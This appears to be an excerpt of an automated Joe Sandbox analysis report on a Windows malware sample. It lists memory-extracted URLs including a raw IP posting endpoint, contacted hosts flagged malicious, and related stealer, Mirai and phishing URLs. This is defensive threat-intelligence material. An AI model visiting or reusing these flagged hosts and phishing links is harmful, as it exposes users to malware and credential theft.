http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://44.207.250.251/post34282f2a34282f2b356a75696e.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C0000A4000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://go.micro	powershell.exe, 00000002.00000002.1969487291.000001F180C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F4225FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC85428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200858C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA8C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.0000020848D01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://httpbin.org	powershell.exe, 00000006.00000002.2007257805.000001F422A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F422AAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208491C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.000002084917C000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
http://www.microsoft.co	powershell.exe, 00000008.00000002.2404481028.0000020083525000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmd	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://httpbin.org/post8	powershell.exe, 00000006.00000002.2007257805.000001F422AC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208491DF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://httpbin.org/post873743475687d356a75696e	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pesterp	powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crl.micro	powershell.exe, 00000008.00000002.2440115787.000002009D7BC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://httpbin.org/post873743475687d356a75696eC:	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://44.207.250.251/postPATHEXTPATHEXT=::=::	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://44.207.250.251/post34282f2a34282f2b356a75696e	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C0000A4000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1969487291.000001F18199D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F190075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICE	powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1969487291.000001F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F42206C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F42207F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC84F4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC84F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200853FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200853EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA875D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA8749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.000002084879D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.0000020848763000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://httpbin.org/postmplant	powershell.exe, 0000000B.00000002.2844916285.00000208491DF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1969487291.000001F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F42203D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC84F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200853B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA880D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208487C4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://44.207.250.251/postPATHEXTC:	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C00009E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://httpbin.o	powershell.exe, 00000006.00000002.2007257805.000001F422AC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208491DF000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmdpower	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000016000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://httpbin.org/post873743475687d356a75696ehttp://httpbin.org/postpowershell.exe.compowershell.ex	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
107.22.40.220	httpbin.org	United States	14618	AMAZON-AESUS	true
44.207.250.251	unknown	United States	14618	AMAZON-AESUS	true
34.236.15.216	unknown	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528569
Start date and time:	2024-10-08 02:21:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
Detection:	MAL
Classification:	mal64.evad.winEXE@14/20@2/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 60% Number of executed functions: 11 Number of non-executed functions: 83
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, PID 7576 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 8124 because it is empty
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
20:22:03	API Interceptor	341x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	54.84.32.120
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	54.84.32.120
	IDMan.exe	Get hash	malicious	Fredy Stealer	Browse	3.224.101.31
	IDMan.exe	Get hash	malicious	Fredy Stealer	Browse	52.86.188.217
	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse	34.199.14.71
	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse	34.199.14.71
	file.exe	Get hash	malicious	LummaC	Browse	18.206.19.26
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse	34.199.23.206
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse	34.199.23.206
	UBONg7lmVR.exe	Get hash	malicious	Unknown	Browse	3.211.178.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	http://pay.christinagstewart.com/	Get hash	malicious	Unknown	Browse	34.234.126.233
	http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/	Get hash	malicious	Unknown	Browse	34.224.32.67
	https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	184.73.182.153
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu	Get hash	malicious	HTMLPhisher	Browse	3.5.16.35
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzA1Mzk4LCJuYmYiOjE3MjgzMDUzOTgsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJpeHI5d3pqeGcwZnI2NGJjbGwycyIsInRva2VuIjoiaXhyOXd6anhnMGZyNjRiY2xsMnMiLCJzZW5kX2F0IjoxNzI4MzA0MzU0LCJlbWFpbF9pZCI6OTk2Mzg3MCwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTM4MjUsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1TcHJpbmcraGFzK3NwcnVuZyslRjAlOUYlOEMlQjEifQ.HIDfaWGNVn-TCtUT4qZNHq7EdymoLEqvVA8XxZBU8z8	Get hash	malicious	HtmlDropper	Browse	23.22.106.69
	cenSXPimaG.elf	Get hash	malicious	Mirai, Okiru	Browse	54.29.55.83
	2UngC9fiGa.elf	Get hash	malicious	Mirai, Okiru	Browse	54.133.8.55
	0wG3Y7nLHa.elf	Get hash	malicious	Mirai, Okiru	Browse	44.194.145.148
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	54.87.50.193
	970Qh1XiFt.elf	Get hash	malicious	Mirai, Okiru	Browse	44.194.145.170
AMAZON-AESUS	http://pay.christinagstewart.com/	Get hash	malicious	Unknown	Browse	34.234.126.233
	http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/	Get hash	malicious	Unknown	Browse	34.224.32.67
	https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	184.73.182.153
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu	Get hash	malicious	HTMLPhisher	Browse	3.5.16.35
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzA1Mzk4LCJuYmYiOjE3MjgzMDUzOTgsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJpeHI5d3pqeGcwZnI2NGJjbGwycyIsInRva2VuIjoiaXhyOXd6anhnMGZyNjRiY2xsMnMiLCJzZW5kX2F0IjoxNzI4MzA0MzU0LCJlbWFpbF9pZCI6OTk2Mzg3MCwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTM4MjUsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1TcHJpbmcraGFzK3NwcnVuZyslRjAlOUYlOEMlQjEifQ.HIDfaWGNVn-TCtUT4qZNHq7EdymoLEqvVA8XxZBU8z8	Get hash	malicious	HtmlDropper	Browse	23.22.106.69
	cenSXPimaG.elf	Get hash	malicious	Mirai, Okiru	Browse	54.29.55.83
	2UngC9fiGa.elf	Get hash	malicious	Mirai, Okiru	Browse	54.133.8.55
	0wG3Y7nLHa.elf	Get hash	malicious	Mirai, Okiru	Browse	44.194.145.148
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	54.87.50.193
	970Qh1XiFt.elf	Get hash	malicious	Mirai, Okiru	Browse	44.194.145.170
AMAZON-AESUS	http://pay.christinagstewart.com/	Get hash	malicious	Unknown	Browse	34.234.126.233
	http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/	Get hash	malicious	Unknown	Browse	34.224.32.67
	https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	184.73.182.153
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu	Get hash	malicious	HTMLPhisher	Browse	3.5.16.35
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzA1Mzk4LCJuYmYiOjE3MjgzMDUzOTgsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJpeHI5d3pqeGcwZnI2NGJjbGwycyIsInRva2VuIjoiaXhyOXd6anhnMGZyNjRiY2xsMnMiLCJzZW5kX2F0IjoxNzI4MzA0MzU0LCJlbWFpbF9pZCI6OTk2Mzg3MCwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTM4MjUsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1TcHJpbmcraGFzK3NwcnVuZyslRjAlOUYlOEMlQjEifQ.HIDfaWGNVn-TCtUT4qZNHq7EdymoLEqvVA8XxZBU8z8	Get hash	malicious	HtmlDropper	Browse	23.22.106.69
	cenSXPimaG.elf	Get hash	malicious	Mirai, Okiru	Browse	54.29.55.83
	2UngC9fiGa.elf	Get hash	malicious	Mirai, Okiru	Browse	54.133.8.55
	0wG3Y7nLHa.elf	Get hash	malicious	Mirai, Okiru	Browse	44.194.145.148
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	54.87.50.193
	970Qh1XiFt.elf	Get hash	malicious	Mirai, Okiru	Browse	44.194.145.170

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Reputation:	moderate, very likely benign file
